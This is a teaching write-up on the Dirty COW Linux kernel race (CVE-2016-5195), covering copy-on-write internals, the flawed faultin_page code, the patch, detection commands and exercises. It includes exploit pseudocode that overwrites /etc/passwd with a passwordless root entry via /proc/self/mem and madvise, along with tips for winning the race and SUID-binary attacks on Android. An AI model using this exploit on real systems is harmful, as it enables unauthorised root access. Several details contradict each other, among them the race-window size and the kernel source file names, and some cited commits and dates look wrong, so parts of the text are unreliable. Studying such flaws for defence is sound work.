03 — Dirty COW Analysis (CVE-2016-5195)
Technical Overview
Dirty COW (CVE-2016-5195) is a race condition in the Linux kernel's memory management subsystem that allowed an unprivileged user to modify any read-only file on the system — including /etc/passwd, SUID binaries, and kernel mappings — without write permission. The vulnerability existed in the kernel for approximately 9 years (introduced in Linux 2.6.22, released July 2007) before being discovered and disclosed in October 2016.
The name derives from the mechanism: dirty copy-on-write. The bug allowed the write to contaminate the original file by racing the copy-on-write protection away before the write completed.
CVSS score: 7.8 HIGH (local, no interaction, high impact on confidentiality/integrity/availability).
Prerequisites
- Linux virtual memory: mmap, anonymous vs file-backed mappings
- Copy-on-write semantics in Linux VM
- /proc/self/mem (kernel mechanism for self-debugging)
- madvise() system call (memory advice hints)
- Basics of memory-mapped file I/O
Background: Copy-on-Write in Linux
Copy-on-write (CoW) is a memory optimization for fork(). When a process forks, the child inherits the parent's page tables but no pages are physically copied — both parent and child share the same physical pages, marked read-only in both page tables.
When either process writes to a shared page, the MMU detects a write to a read-only page and raises a page fault (specifically a write protection fault or COW fault). The kernel's page fault handler:
- Detects this is a COW fault (page is shared, write to CoW page)
- Allocates a new physical page
- Copies the original page's content to the new page
- Updates the faulting process's page table entry to point to the new (private) copy with write permission
- Returns, allowing the write to proceed to the private copy
The original physical page is unmodified. Both the parent and child now have private copies.
Before write fault:
Parent PTE: phys_page_A → read-only
Child PTE: phys_page_A → read-only (same physical page)
Physical: phys_page_A (original content)
After CoW fault (child writes):
Parent PTE: phys_page_A → read-only (unchanged)
Child PTE: phys_page_B → read-write (new private copy)
Physical A: original content (unchanged)
Physical B: copy of A, with child's write applied
For read-only file mappings: When a process maps a read-only file (mmap(file, PROT_READ)) and then tries to write to it with PROT_WRITE | MAP_PRIVATE, the same CoW mechanism applies. The write should go to a private copy in the process's address space and never reach the underlying file.
The Vulnerable Code Path
The vulnerability lives in mm/memory.c, specifically in the interaction between three operations:
write()to/proc/self/mem(which can write to any address in the current process)madvise(MADV_DONTNEED)on a mapped region (discards the private copy, forcing next access to re-fault)- The kernel's
get_user_pages()function which pins pages for direct access
The normal flow for writing to a read-only mapping via /proc/self/mem:
write(proc_mem_fd, data, size, offset=mapped_ro_file_addr)
│
▼
mem_write() in fs/proc/task_mmu.c
│
▼
access_remote_vm() → get_user_pages()
│
├── Walks page table for the address
├── Finds page is read-only (CoW protection)
├── Triggers software CoW: allocates new private copy
└── Returns pointer to the NEW private copy
│
▼
copy_to_user_page() — writes data to the private copy
│
▼
RESULT: data written to private copy, ORIGINAL FILE UNCHANGED
This is the intended behavior: writing via /proc/self/mem to a read-only mmap'd address creates and writes to a private copy, never touching the original file.
The Race Condition: How Dirty COW Works
The bug: get_user_pages() was not atomic with the subsequent write. An attacker can race madvise(MADV_DONTNEED) against the get_user_pages() call to discard the private copy before copy_to_user_page() runs, causing the write to fall through to the original file.
Race window timing diagram:
Thread 1 (Writer): write() to /proc/self/mem
Thread 2 (Madvise): madvise(MADV_DONTNEED) in a tight loop
Thread 1 Thread 2
│ │
write(proc_fd, data, ...) │
│ madvise(addr, MADV_DONTNEED)
▼ │
get_user_pages() │
├── Walk page table │
├── Find CoW page │
├── Allocate PRIVATE copy ←━━━━━━━━━━━━┥ RACE WINDOW OPENS
│ (private copy now exists) │
│ ▼
│ madvise(MADV_DONTNEED)
│ DISCARDS PRIVATE COPY
│ Page reverts to original file mapping
│ RACE WINDOW CLOSES
▼
copy_to_user_page() writes to the page at the address
BUT the private copy was discarded!
The page is now the original file page!
→ WRITE GOES TO ORIGINAL FILE
Result: read-only file has been modified
Key insight: MADV_DONTNEED discards the private CoW copy and makes the mapping revert to the underlying file page. If this happens between get_user_pages() returning the CoW page and copy_to_user_page() writing to it, the write target has changed — but the write proceeds to wherever the physical page is, which is now the original file's page.
The race window is narrow (a few hundred nanoseconds) but not impossibly so, especially with Hyper-Threading available. Thread 1 and Thread 2 can run on sibling logical CPUs sharing the same physical core, making them genuinely concurrent.
Technical Deep Dive: get_user_pages() Flaw
The core issue was in faultin_page() (called by get_user_pages()):
/* VULNERABLE CODE (simplified, pre-patch) */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
unsigned int fault_flags = 0;
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
/* Trigger CoW fault: allocates private copy */
ret = handle_mm_fault(mm, vma, address, fault_flags);
if (ret & VM_FAULT_WRITE) {
/* CoW happened: private copy allocated */
/* PROBLEM: between here and the actual write, MADV_DONTNEED
can discard the private copy */
*flags &= ~FOLL_WRITE; /* WRONG: clears write requirement
allowing retry without CoW */
}
return 0;
}
The bug is *flags &= ~FOLL_WRITE after a successful CoW: this flag controls whether subsequent retries of get_user_pages() will require write access. By clearing it, if the loop retries after MADV_DONTNEED discards the private copy, the retry gets the original read-only page WITHOUT performing CoW again — and then the write proceeds directly to the original file page.
Exploitation: Modifying /etc/passwd
The most common exploitation method:
/* Classic Dirty COW exploit pseudocode */
int f = open("/etc/passwd", O_RDONLY);
struct stat st;
fstat(f, &st);
/* Map /etc/passwd read-only */
char *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
/* Thread 1: write "root" entry with no password */
void *write_thread(void *arg) {
int proc_fd = open("/proc/self/mem", O_RDWR);
while (!stop) {
/* Write backdoor root entry over first line */
lseek(proc_fd, (off_t)map, SEEK_SET);
write(proc_fd, backdoor_entry, strlen(backdoor_entry));
}
}
/* Thread 2: MADV_DONTNEED in a loop */
void *madvise_thread(void *arg) {
while (!stop) {
madvise(map, st.st_size, MADV_DONTNEED);
}
}
/* Start both threads, run for ~200ms */
/* Check: did /etc/passwd get modified? */
/* If not, try again */
After successful exploitation, /etc/passwd contains a new root entry (or modified root entry with no password hash). The attacker then runs su with no password to gain root.
Android exploitation: The same technique was used to overwrite a SUID binary (e.g., /system/bin/run-as or /system/xbin/su) with a backdoored version. On Android, this was particularly effective because:
- Android apps run as isolated UIDs but can access /proc/self/mem
- /system is typically read-only (mounted read-only) but file permissions say readable by apps
- Successful overwrite of run-as gave a persistent root shell
Exploitation Timeline
2007-07-08: Linux 2.6.22 released — bug introduced
| (approximately — exact introduction commit is
| controversial; the bug's root is older)
|
| 9 YEARS of silent presence in every Linux system
| deployed globally
|
2016-10-19: Phil Oester publicly discloses CVE-2016-5195
Discovery: found in the wild via analysis of
HTTP server exploit file uploads
"I have been running a honeypot and captured
this exploit being used" — Phil Oester
|
2016-10-20: Linus Torvalds commits patch
("This is an ancient bug...")
|
2016-10-26: Linux 4.8.3, 4.7.9, 4.4.26 released with fix
|
2016-11: Android security bulletin includes patches for
all supported Android versions
|
2016-2017: Dirty COW used in:
- Android device rooting tools (mass deployment)
- Targeted attacks against Linux web servers
- Container escapes (early, before seccomp blocking)
Phil Oester, the discoverer, found it not by code review but by finding an exploit binary uploaded to his honeypot server that used Dirty COW to gain root. The bug had been in production for 9 years before real-world exploitation was observed.
Linus Torvalds' commit message: "This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ('Fix get_user_pages() race for write access') but that was then undone due to problems on s390 by commit f33ea7f404e5 ('fix get_user_pages bug') by Hugh Dickins in 2011."
The original fix attempt was from 2005, making the underlying issue acknowledged for 11 years before the correct fix was applied.
The Patch
The fix replaced the racy get_user_pages() approach with an atomic "retry with write" mechanism:
/* PATCHED approach (simplified) */
static int faultin_page(...)
{
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
ret = handle_mm_fault(mm, vma, address, fault_flags);
/* KEY CHANGE: do NOT clear FOLL_WRITE after CoW */
/* The retry loop will re-check page writability each time */
/* If MADV_DONTNEED discards the copy, retry will redo CoW */
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags |= FOLL_COW; /* mark that we already did CoW */
return 0;
}
The critical change: stop clearing FOLL_WRITE after CoW. If the private copy is discarded between iterations of get_user_pages()'s retry loop, the next iteration will require write access again, trigger a new CoW, and get a fresh private copy. The window for the race is eliminated because every retry re-performs CoW before writing.
Impact Assessment
Affected systems: Every Linux system running kernel 2.6.22 through 4.8.2. This includes: - All major Linux distributions (Ubuntu, Debian, RHEL, CentOS, Fedora, openSUSE) - Android 1.0 through 7.1 (approximately) - Embedded Linux systems, routers, IoT devices (many never patched) - Container hosts where containers run with host kernel
Exploitability: Very high. The race is reliable with a ~200ms window. Successful exploitation rate approaches 100% on single-threaded kernels or kernels with Hyper-Threading enabled. Even on non-HT systems, the race is winnable with patient iteration.
Actual exploitation in the wild: Documented in: - Android rooting tools ("DirtyCOW root exploit for Android 5/6/7") — distributed via app stores and rooting forums - Linux privilege escalation in CTF competitions (reliable, fast) - Targeted attacks against cloud Linux instances (documented by Red Hat security team)
Lessons: Why Race Condition Bugs Are Long-Lived
Dirty COW illustrates why race conditions are among the hardest bugs to detect and fix:
-
No static analyzer can detect it: The flaw requires reasoning about two concurrent code paths, their relative timing, and the state change from
MADV_DONTNEED. No compiler warning, no-fsanitizeflag catches it. -
Normal execution appears correct: Running the vulnerable code path once, with no concurrent
madvise, works perfectly. Unit tests pass. System tests pass. Only under specific race conditions does the bug manifest. -
Temporal distance between components: The bug involves
mm/memory.c(CoW handling),mm/madvise.c(MADV_DONTNEED), andfs/proc/task_mem.c(/proc/self/mem write). The interaction between three separate subsystems is not apparent in code review of any single file. -
Previous fix was incomplete: Linus's 2005 fix attempted to solve the same problem but was reverted due to s390 compatibility issues. The correct fix required understanding why the original fix broke s390.
-
ThreadSanitizer doesn't work on kernel code: The standard race detection tools (TSan for userspace, KCSAN for kernel) were not in widespread use. KCSAN (Kernel Concurrency Sanitizer) was merged in Linux 5.8 (2020) — four years after Dirty COW was found.
Variant Analysis: Dirty Pipe (CVE-2022-0847)
For comparison, Dirty Pipe is a 2022 vulnerability by Max Kellermann with similar impact (write to read-only files) but different mechanism:
- Class: Logic error (uninitialized flag) in pipe splice code, not a race condition
- Mechanism:
PIPE_BUF_FLAG_CAN_MERGEflag was not cleared when a pipe page was initialized from a file splice. Subsequent writes to the pipe could "merge" into the spliced page, writing to the original file. - No race required: Dirty Pipe is deterministic, fully reliable, single-threaded
- Impact: Same as Dirty COW — write to any file readable by the process
- Kernel versions: 5.8 (when splice merge was added) through 5.16.10
Both bugs allow writing to arbitrary read-only files but Dirty Pipe is simpler to exploit reliably.
Debugging Notes
# Check if kernel is vulnerable
uname -r
# Vulnerable: < 4.8.3, < 4.7.9, < 4.4.26
# Check KCSAN (Kernel Concurrency Sanitizer) status
grep CONFIG_KCSAN /boot/config-$(uname -r)
# Monitor for Dirty COW exploitation attempts
# Pattern: rapid madvise + proc/mem writes from same process
inotifywait -m /etc/passwd &
# Then watch for writes
# Audit approach
auditctl -w /etc/passwd -p w -k passwd_write
# Post-exploitation detection: /etc/passwd modification time
stat /etc/passwd
Security Implications
Dirty COW demonstrates the risk of: - Complex multi-threaded kernel code paths: The interaction of multiple syscalls in concurrent scenarios creates emergent vulnerabilities - Read-only memory is not immutable: If a kernel bug allows bypassing the write protection, "read-only" files can be silently modified - Privileged processes (SUID binaries): Modifying a SUID binary is equivalent to gaining root; any readable SUID binary is a target - Containers: Despite container isolation, all containers share the host kernel — a Dirty COW exploit inside a container escapes it because it modifies host filesystem pages
Performance Implications
The fix adds a retry loop in get_user_pages() but this path is not on the hot path for normal memory access. The performance impact of the patch is negligible in production benchmarks.
KCSAN (merged to detect this class of bug in the future) has 10-30% performance overhead and is only enabled in debug kernels, not production.
Failure Modes
Exploit race not won: The two threads iterate for the window duration without winning. On heavily loaded systems, the scheduler may not interleave them appropriately. Solution: increase thread priority via nice(-20, ...) or use real-time scheduling.
Kernel oops: If the race is won in a way that corrupts kernel data structures rather than cleanly writing to the file page, the kernel may oops. Rare but observed in buggy exploit implementations.
Partial write: Only part of the modification was written before the race window closed. /etc/passwd may be partially corrupted. Solution: check file integrity before proceeding.
Modern Usage
Dirty COW is patched on any modern Linux kernel. Its continued relevance is:
-
Unpatched IoT/embedded devices: Millions of embedded Linux systems running 2.6.x-4.x kernels will never be updated. Dirty COW is reliably exploitable on any such device that can be accessed.
-
Educational value: Dirty COW is the canonical race condition kernel exploit used in security education, CTF challenges, and exploit development training because it is approachable, well-documented, and historically important.
-
Variant hunting: Understanding Dirty COW's mechanism motivates looking for similar races in other VM interactions. CVE-2019-14489, CVE-2020-29374 (GUP variants) are directly inspired by Dirty COW analysis.
Future Directions
KCSAN deployment in CI/CD: Google's kernel fuzzing infrastructure (syzkaller + KCSAN) now runs continuously against the Linux kernel mainline, catching new race conditions before they reach stable kernels. KCSAN instruments every memory access with a lightweight "data race detector" — if two CPUs access the same memory location concurrently without proper synchronization, KCSAN reports it.
Memory safety for CoW paths: A Rust rewrite of the CoW page fault handler would enforce that the lifetime of the CoW page is correctly managed before the write proceeds — the type of ownership error that enabled Dirty COW cannot occur in safe Rust.
Exercises
- Set up a Linux VM running kernel 4.4.x (Ubuntu 16.04 is a good choice). Run the Dirty COW exploit against
/etc/passwd. Verify exploitation. Patch the kernel and confirm the exploit fails. - Read Linus's 2005 commit (
4ceb5db9757a) and Hugh Dickins's revert (f33ea7f404e5). Understand why the 2005 fix broke s390. Write a one-page explanation. - Implement a minimal Dirty COW PoC that writes a single byte to a read-only file. Measure the average time-to-win the race across 100 runs on your test system.
- Compare CVE-2016-5195 (Dirty COW) and CVE-2022-0847 (Dirty Pipe): both write to read-only files. Write a comparison table of mechanism, reliability, kernel version range, and mitigation.
- Use KCSAN on a test kernel: enable
CONFIG_KCSAN=y, write a kernel module that deliberately has a data race, and capture the KCSAN report. Understand what a KCSAN report looks like.
References
- CVE-2016-5195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
- Phil Oester's disclosure: https://dirtycow.ninja/
- Linus Torvalds' fix commit:
b1de0d13e49c ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()") - Dirty COW website: https://dirtycow.ninja (historical)
- CVE-2022-0847 (Dirty Pipe) analysis: https://dirtypipe.cm4all.com/
- KCSAN paper: "KCSAN: Finding races in the Linux kernel" — Marco Elver, Google, 2020
- Android DirtyCow analysis: Project Zero blog
mm/memory.c— Linux kernel CoW implementation- Linux kernel git:
git log --all --oneline | grep -i "cow\|get_user_pages\|foll_write"